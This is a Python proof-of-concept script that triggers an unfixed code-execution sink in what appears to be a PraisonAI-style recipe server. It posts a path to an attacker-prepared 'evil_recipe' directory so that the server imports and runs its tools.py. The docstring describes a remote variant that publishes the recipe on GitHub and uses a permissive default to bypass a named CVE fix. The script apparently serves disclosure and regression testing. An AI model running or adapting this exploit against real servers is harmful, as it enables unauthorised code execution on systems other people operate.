"""Trigger the unfixed exec_module() sink in templates/tool_override.py.

Sends a single POST to /v1/recipes/run with `recipe` pointing at our
absolute path. The server resolves the path, parses TEMPLATE.yaml, then
calls create_tool_registry_with_overrides(template_dir=<our_path>),
which auto-imports tools.py via spec.loader.exec_module().

Local-path variant: evil_recipe/ must already exist at a path the server
can read (filesystem prerequisite). For the remote variant,
publish evil_recipe/ to GitHub and replace `recipe_path` with
"github:<user>/<repo>/poc-recipe" — exploitable because
SecurityConfig.allow_any_github defaults to True.
"""
import json
import os
import urllib.error
import urllib.request

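# Loopback target: the absolute path sent below is only meaningful to a
# server that shares this machine's filesystem.
SERVER = "http://127.0.0.1:8765"
# Absolute path of the evil_recipe/ directory that sits next to this script.
recipe_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "evil_recipe"))

# Single JSON POST whose only field is the recipe location. The request
# carries no credentials or auth header.
req = urllib.request.Request(
    f"{SERVER}/v1/recipes/run",
    data=json.dumps({"recipe": recipe_path}).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
try:
    with urllib.request.urlopen(req, timeout=30) as resp:
        # Read the status while the response object is still open rather
        # than touching it after the `with` block has closed it.
        status = resp.status
        body = resp.read().decode()
except urllib.error.HTTPError as err:
    # urlopen raises on 4xx/5xx. A rejected request is a meaningful outcome
    # when this script is re-run as a regression check after a fix, so
    # report the status and body instead of dying with a traceback.
    status = err.code
    body = err.read().decode(errors="replace")

print(f"[+] HTTP {status}")
print(body)
print()
# The HTTP status alone does not show whether tools.py was imported; the
# server-side marker below is the actual evidence.
print("[+] Check server stdout for: '[CVE-2026-40287-bypass] RCE fired.'")
# NOTE(review): TEMP is read from *this* process's environment, while the
# marker is presumably written by the server process. The printed directory
# is only right when both run on the same host with the same TEMP; confirm.
print(f"[+] Marker file in {os.path.join(os.environ.get('TEMP', '/tmp'), 'praisonai_pwn_*.txt')}")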
